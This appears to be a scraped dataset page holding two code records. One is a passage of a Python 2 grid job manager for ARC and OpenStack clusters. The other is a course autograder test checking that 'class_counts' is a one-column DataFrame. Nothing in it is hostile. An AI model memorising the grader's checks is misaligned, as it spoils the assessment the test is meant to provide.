        logger.info("Grid proxy is valid for " + c.ValidFor())
        # Get a list of jobs, and find their statuses.
        self.busy_clusters = []
        self.active_jobs = []
        # active_jobs.txt holds one "jobid#jobname" line per outstanding job.
        self.active_jobsfilename = os.path.join(self.scratchpath, "active_jobs.txt")
        if os.path.isfile(self.active_jobsfilename):
            jobids = {}
            f = open(self.active_jobsfilename, "r")
            for line in f:
                (jid, jname) = line.split('#')
                jobids[jid] = jname[:-1] # (Remove trailing '\n' from name).
        else:
            jobids = {}
        if jobids:
            # Classify each known job into a "stage" based on its ARC status.
            for info in self.arclib.GetJobInfo(jobids.keys()):
                job = {"id": info.id, "name": jobids[info.id]}
                if info.status in [ "FINISHED", "FAILED" ]:
                    job["stage"] = "Done"
                    job["success"] = (info.status == "FINISHED")
                elif info.status in [ "DELETED", "KILLED", "KILLING" ]:
                    job["stage"] = "Aborted" # Supposed to disappear by itself soonish
                elif info.status in [ "ACCEPTING", "ACCEPTED", "PREPARING", "PREPARED", "SUBMITTING", "INLRMS:Q" ]:
                    job["stage"] = "Queueing"
                    if info.cluster not in self.busy_clusters:
                        self.busy_clusters.append(info.cluster)
                elif info.status == "":
                    # XXX: The most common reason for info.status == "" is that
                    # the job was submitted so recently that ARC info.sys.
                    # hasn't picked up the job yet, which is why I decided
                    # to consider it to be "Queueing". But it could also be the
                    # ARC info.sys being down, or other problems.
                    job["stage"] = "Queueing"
                    if info.cluster not in self.busy_clusters:
                        self.busy_clusters.append(info.cluster)
                else:
                    job["stage"] = "Running"
                if job["stage"] != "Aborted":
                    self.active_jobs.append(job)
                #logger.info("Job %s / %s found in state %s (%s)" % (job["name"], job["id"], job["stage"], info.status))
        # loads the server job-queue
        self.job_queue_filename = os.path.join(self.scratchpath, "job_queue.pickle")
        if os.path.isfile(self.job_queue_filename):
            f = open(self.job_queue_filename, "r")
            self.job_queue = pickle.load(f)
            f.close()
        else:
            self.job_queue = []
        self.init_completed = True
    def __del__(self):
        """
        Remember jobs for future invocations.
        """
        logger.debug("ARC.__del__ invoked!")
        if self.init_completed:
            # Save the jobs to two files for the future, but only if
            # __init__() was successful - if it wasn't we might not have
            # read all the jobs from previous runs, in which case
            # information on those jobs would be overwritten.
            # (And no jobs could have been submitted or retrieved;
            # init_completed = False means we crashed at an early stage, so
            # there's nothing new to save)
            f = open(self.active_jobsfilename, "w")
            for j in self.active_jobs:
                if j["stage"] not in ["Aborted", "Retrieved"]:
                    f.write(j["id"] + '#' + j["name"] + '\n')
            f.close()
            f = open(self.job_queue_filename, "w")
            pickle.dump(self.job_queue, f)
            f.close()
    def create_wrapper_script(self):
        '''Create a wrapper script to execute a job. Return path to script.'''
        s = """
        #!/bin/bash
        set -e # Immediately exit if any command fail
        ls -l
        if [ -f client-bin ]; then
            # It seems we got a EON client binary as an inputfile. It does
            # (probably) not have execute bit set, and it might be a
            # sym-link to a file we don't own, so we have to make a copy
            # and change permissions of the copy instead.
            export PATH=$PATH:$PWD
            cp client-bin client
            chmod +x client
        fi
        ls -l
        tar jxvf $1.tar.bz2
        cd $1
        client
        cd $HOME
        tar jcvf $1.tar.bz2 $1
        echo $1
        """
        script_path = os.path.join(self.scratchpath, 'wrapper.sh')
        try:
            f = open(script_path, "w")
            f.write(s)
            f.close()
        except Exception, msg:
            raise CommunicatorError("Can't create wrapper script: %s" % msg)
        return script_path
    def create_tarball(self, src, dest):
        """Pack directory 'src' into tar.bz2 file 'dest', making sure it will unpack into
        a dir called basename(src), rather than path/to/src"""
        # Remove trailing '/'; it would cause trouble with
        # os.path.dirname() and os.path.basename()
        if src[-1] == '/':
            src = src[:-1]
        # Since we'll change directory for a while, we should make sure we
        # use absolute paths, rather than relative ones:
        src = os.path.abspath(src)
        dest = os.path.abspath(dest)
        dirname = os.path.dirname(src)
        basename = os.path.basename(src)
        cwd = os.getcwd()
        try:
            os.chdir(dirname)
            tarball = tarfile.open(dest, 'w:bz2')
            tarball.add(basename)
            tarball.close()
        finally:
            # Always restore the working directory, even on failure.
            os.chdir(cwd)
    def open_tarball(self, filename, dest_dir):
        """Unpack tar.bz2 file beneath the directory dest_dir."""
        try:
            tarball = tarfile.open(filename, 'r:bz2')
            # For security reasons, filter out filenames that might end up
            # outside of 'dest_dir':
            files = tarball.getmembers()
            good_files = [ f for f in files if f.name[0:2] != '..' and f.name[0] != '/' ]
            for f in good_files:
                tarball.extract(path=dest_dir, member=f)
            tarball.close()
        except IOError:
            logger.warning("Could not open tarball %s" % (filename))
    def create_job(self, job_path, wrapper_path):
        '''Prepare a job who's inputfiles are found in 'job_path'.
        Return a string to be used as input for xsrl and job name.'''
        # Remove trailing '/'; it would cause trouble with os.path.basename()
        if job_path[-1] == '/':
            job_path = job_path[:-1]
        basename = os.path.basename(job_path)
        tarball_path = os.path.join(self.scratchpath, basename + ".tar.bz2")
        self.create_tarball(job_path, tarball_path)
        # The job directory has been packed; remove the original.
        shutil.rmtree(job_path)
        # Build the xRSL job-description string piecewise.
        s = "&"
        s += "(executable=%s)" % os.path.basename(wrapper_path)
        s += "(arguments=%s)" % basename
        s += "(inputFiles="
        if self.client_path:
            s += "(%s %s)" % ("client-bin", self.client_path)
        s += "(%s %s)" % (os.path.basename(wrapper_path), wrapper_path)
        s += "(%s %s)" % (os.path.basename(tarball_path), tarball_path)
        s += ")"
        s += "(outputFiles="
        s += "(%s '')" % os.path.basename(tarball_path)
        s += ")"
        if config.debug_keep_all_results:
            s += "(stdout=stdout)"
            s += "(stderr=stderr)"
            s += "(gmlog=gmlog)"
        if not self.client_path:
            # No client binary shipped: rely on the runtime environment
            # being installed on the cluster.
            s += "(runTimeEnvironment=APPS/CHEM/EON2)"
        jobname = "%s" % basename
        s += "(jobName=%s)" % jobname
        # requirements to the host
        # 500 MB memory
        s += '(Memory="500")'
        # 120 minutes
        s += '(wallTime="120")'
        logger.debug("job_string: " + s)
        return s, jobname, tarball_path
    def submit_job_to_target(self, hostname):
        '''Pop one job from the local queue and submit it to the cluster
        with the given hostname, if that cluster is a valid target.'''
        if(len(self.job_queue)):
            job_string, job_name, job_tarball = self.job_queue.pop(0)
            xrsl = self.arclib.Xrsl(job_string)
            # fetch the target which hostname passed was
            target = None
            all_targets = self.arclib.ConstructTargets(self.queue_info, xrsl)
            for t in all_targets:
                if t.cluster.hostname == hostname:
                    target = self.arclib.PerformStandardBrokering([t])
                    break
            if target:
                try:
                    job_id = self.arclib.SubmitJob(xrsl, target)
                    # Input tarball was uploaded at submission; clean it up.
                    os.remove(job_tarball)
                except self.arclib.JobSubmissionError, msg:
                    raise CommunicatorError(msg)
                except self.arclib.XrslError, msg:
                    raise CommunicatorError(msg)
                self.arclib.AddJobID(job_id, job_name)
                self.active_jobs.append({"id": job_id, "name": job_name, "stage":"Queueing"})
                logger.info("Submitted " + job_id)
            else:
                logger.info("Failed to submit to " + hostname)
    def get_targets_hostnames(self, xrsl):
        """Get list of hostnames of clusters+queues we can submit to."""
        hostnames = []
        targets = self.get_targets(xrsl)
        for t in targets:
            hostnames.append(t.cluster.hostname)
        return hostnames
    def get_targets(self, xrsl):
        """Get list of clusters+queues we can submit to."""
        if not self.queue_info:
            # GetQueueInfo is expensive; fetch once and cache.
            self.queue_info = self.arclib.GetQueueInfo()
        targets_initial = self.arclib.ConstructTargets(self.queue_info, xrsl)
        logger.debug("List of targets: " + ', '.join([ t.cluster.hostname for t in targets_initial ]))
        # Drop blacklisted clusters...
        if self.blacklist:
            targets_not_bl = []
            for t in targets_initial:
                if t.cluster.hostname not in self.blacklist:
                    targets_not_bl.append(t)
            logger.debug("List of targets after blacklisting: " + ', '.join([ t.cluster.hostname for t in targets_not_bl ]))
        else:
            targets_not_bl = targets_initial
        # ...and clusters where we already have jobs queueing.
        if self.busy_clusters:
            targets = []
            for t in targets_not_bl:
                if t.cluster.hostname not in self.busy_clusters:
                    targets.append(t)
            logger.debug("List of targets after queing check: " + ', '.join([ t.cluster.hostname for t in targets ]))
        else:
            targets = targets_not_bl
        return self.arclib.PerformStandardBrokering(targets)
    def submit_jobs(self, data, invariants):
        '''Throws CommunicatorError if fails.'''
        # add new jobs to queue
        wrapper_path = self.create_wrapper_script()
        for job_path in self.make_bundles(data, invariants):
            job_string, job_name, job_tarball = self.create_job(job_path, wrapper_path)
            self.job_queue.append([job_string, job_name, job_tarball])
        # are there jobs to submit
        if len(self.job_queue):
            # uses first element in queue to get list of free resources
            xrsl = self.arclib.Xrsl(self.job_queue[0][0])
            targets_hostnames = self.get_targets_hostnames(xrsl)
        else:
            targets_hostnames = []
        # Submit up to num_submit jobs to each available cluster.
        for target_hostname in targets_hostnames:
            submitted_to_target = 0
            while (submitted_to_target < self.num_submit):
                self.submit_job_to_target(target_hostname)
                submitted_to_target = submitted_to_target + 1
    def get_job_output(self, jobid, resultspath):
        """Fetch the output files of a job.
        The files are put in a subdirectory of resultspath,
        and the full path of the subdirectory is returned."""
        n = jobid.split('/')[-1]
        outputdir = os.path.join(resultspath, n)
        if not os.path.isdir(outputdir):
            os.makedirs(outputdir)
        ftp = self.arclib.FTPControl()
        ftp.DownloadDirectory(jobid, outputdir)
        return outputdir
    def get_results(self, resultspath, keep_result):
        '''Returns a list of directories containing the results.'''
        result_dirs = []
        done = [ j for j in self.active_jobs if j["stage"] == "Done" ]
        for job in done:
            jid = job["id"]
            jname = job["name"]
            p = self.get_job_output(jid, self.scratchpath)
            tarball = os.path.join(p, "%s.tar.bz2" % jname)
            if job["success"]:
                self.open_tarball(tarball, resultspath)
                logger.info("Fetched %s / %s" % (jname, jid))
            else:
                logger.warning("Job %s / %s FAILED.\nOutput files can be found in %s" % (jname, jid, p))
            job["stage"] = "Retrieved"
            self.arclib.RemoveJobID(jid) # Remove from ~/.ngjobs
            self.arclib.CleanJob(jid)    # Remove from ARC sever
            if not config.debug_keep_all_results:
                os.remove(tarball) # keep server scratch dir clean
                shutil.rmtree(p)
        for bundle in self.unbundle(resultspath, keep_result):
            for result in bundle:
                yield result
    def get_queue_size(self):
        '''Returns the number of items waiting to run in the server queue.'''
        return len(self.job_queue)
    def cancel_job(self, job):
        '''Removed job from cluster queue'''
        try:
            self.arclib.CleanJob(job["id"])
        except:
            # Best-effort: keep the local record so we do not lose track
            # of a job that may still be alive on the cluster.
            logger.warning('Did not clean up the cancelled job!')
            return
        # we are sure that the job is removed from the cluster
        # remove id from the local list
        self.arclib.RemoveJobID(job["id"])
        job["stage"] = "Aborted"
        return
    def cancel_state(self, statenumber):
        '''Returns the number of workunits that were canceled.'''
        logger.debug("cancel_state called with statenumber = %i (%s)" % (int(statenumber), type(statenumber)))
        n = 0
        for j in self.active_jobs:
            # Job names are "<state#>_<job#>"; cancel jobs for this state
            # and all earlier ones.
            sn = j["name"].split('_')[0]
#            if int(sn) == int(statenumber) and j["stage"] not in [ "Aborted", "Retrieved" ]:
            if int(sn) <= int(statenumber) and j["stage"] not in [ "Aborted", "Retrieved" ]:
                self.cancel_job(j)
                logger.debug("Canceling job %s / %s" % (j["name"], j["id"]))
                n += 1
        self.job_queue = []
        return n
class OSP(Communicator):
    '''Communicator that farms jobs out to OpenStack worker instances
    through Celery tasks (eon_work).'''
    def __init__(self, scratchpath, bundle_size, rc_files, n_workers = None, master_index = 0, eon_server = None):
        #print scratchpath,bundle_size,rc_files,n_workers
        Communicator.__init__(self, scratchpath, bundle_size)
        if eon_server == "web":
            self.ip = '127.0.0.1'
        elif eon_server == "local" and os.path.isfile(os.path.join(scratchpath,'.running')):
            # A cluster is already running; reuse its saved metadata.
            f = open(os.path.join(scratchpath,'.running'),'r')
            self.metadata = pickle.load(f)
        else:
            # Boot a fresh OpenStack cluster.
            self.metadata = openstackeon.run(rc_files,n_workers,scratchpath,master_index)
        # NOTE(review): in the "web" branch self.metadata is never assigned,
        # so this line would raise AttributeError there -- confirm the
        # intended control flow.
        self.ip = self.metadata['master_ip']
        self.scratchpath = scratchpath
        # Restore the list of outstanding Celery AsyncResults, if any.
        jobs_path = os.path.join(self.scratchpath,'.jobs')
        if os.path.isfile(jobs_path):
            jobs = open(jobs_path,'r')
            self.jobs = pickle.load(jobs)
        else:
            self.jobs = []
    def get_results(self, resultspath,keep_result):
        '''Moves work from queue to results path.'''
        ##TODO Add timeout
        # Each finished task returns (relative path, base64-encoded output).
        results = [job.get() for job in self.jobs if job.ready() == True]
        for (path,b64) in results:
            path = os.path.join(resultspath,path)
            if not os.path.exists(path):
                os.mkdir(path)
            f = open(os.path.join(path,'out.dat'),'w')
            f.write(base64.b64decode(b64))
            f.close()
        for bundle in self.unbundle(resultspath, keep_result):
            for result in bundle:
                yield result
    def submit_path(self,jobpath):
        '''Queue a single job directory as a Celery task; returns the
        AsyncResult handle.'''
        jobdir = os.path.split(jobpath)[1]
        logger.info("OSP: Queing %s" %(jobpath))
        # Ship the job directory as a base64-encoded tarball.
        message = openstackeon.tar64(jobpath)
        return eon_work.delay(message,jobdir)
    def submit_jobs(self, jobpaths,invariants):
        '''Run up to clients to process the work in jobpaths.
        The job directories are moved to the scratch path before the calculation
        is run. This method doesn't return anything.'''
        ##TODO ADD timeout.
        bundles = self.make_bundles(jobpaths,invariants)
        self.jobs = [self.submit_path(jobpath) for jobpath in bundles]
        #while all([job.ready() for job in self.jobs]) is not True:
        #    print [job.ready() for job in self.jobs]
        #    sleep(0.1)
        # Persist the AsyncResult handles so a restarted server can still
        # collect these jobs.
        jobs_path = os.path.join(self.scratchpath,'.jobs')
        jobs = open(jobs_path,'w')
        pickle.dump(self.jobs,jobs)
    def get_queue_size(self):
        ##TODO Get queue size from Celery
        print "get_queue_size", self.ip
        return len(self.jobs)
    def cleanup(self):
        '''Kill running OS instances'''
        ##TODO Fix cleanup
        for instance in self.instances:
            instance.terminate()
|
[
"MaxN90@gmail.com"
] |
MaxN90@gmail.com
|
3269d977f4f6d44a4f58c7130663ff644a951a93
|
f5ced23208510d76b5df1571b44e344086ca8bef
|
/Projects/Project01/tests/q1_7.py
|
e793ac32bd0c661bd63bc54247df4469c15478ca
|
[] |
no_license
|
jemmott/DSC10-Sp20
|
1c358638cbbe086cc1710c66dd299889d754b4ac
|
a1c30d7dc318471f1ce17cd613ffc278fe00f1db
|
refs/heads/master
| 2021-05-16T18:44:47.022718
| 2020-06-09T19:52:11
| 2020-06-09T19:52:11
| 250,424,744
| 4
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 421
|
py
|
test = {
'name': 'q1_7',
'points': 1,
'suites': [
{
'cases': [
{
'code': r"""
>>> # should be a dataframe
>>> isinstance(class_counts, bpd.DataFrame)
True
>>> len(class_counts.columns) == 1
True
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
|
[
"51950358+jeffrey7377@users.noreply.github.com"
] |
51950358+jeffrey7377@users.noreply.github.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.